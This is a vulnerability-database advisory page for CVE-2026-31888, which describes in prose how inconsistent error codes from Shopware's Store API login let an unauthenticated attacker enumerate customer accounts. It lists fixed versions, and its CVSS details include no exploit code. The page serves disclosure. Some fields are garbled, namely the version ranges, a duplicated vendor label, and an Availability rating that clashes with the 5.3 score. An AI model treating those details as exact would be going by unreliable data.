Inconsistent Error Handling in Shopware Store API Login Endpoint
CVE-2026-31888

5.3MEDIUM

Key Information:

Vendor: Shopware
Status: Core; Platform
Vendor: CVE Published:; 11 March 2026

What is CVE-2026-31888?

Shopware, a popular open commerce platform, has a vulnerability in its Store API login endpoint that allows unauthorized attackers to enumerate valid customer accounts. This occurs due to inconsistent error messages returned when incorrect login credentials are submitted. When an email address belonging to a registered customer is used, the API returns a specific error code. Conversely, when an unregistered email address is submitted, it provides a different error code along with the echoed email address. While the storefront login controller consolidates these error responses, the Store API does not, thereby exposing sensitive information. This inconsistency can lead to unauthorized access attempts and potentially facilitate additional attacks. The issue is remedied in versions 6.7.8.1 and 6.6.10.15.

Affected Version(s)

core >= 6.7.0.0, < 6.7.8.1 < 6.7.0.0, 6.7.8.1

core < 6.6.10.15 < 6.6.10.15

platform >= 6.7.0.0, < 6.7.8.1 < 6.7.0.0, 6.7.8.1

References

https://github.com/shopware/shopware/security/advisories/...

x_refsource_CONFIRM

CVSS V3.1

Score:

5.3

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

None

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Mar 11, 2026
Vulnerability Reserved
Mar 9, 2026

CVE-2026-31888 Data

JSON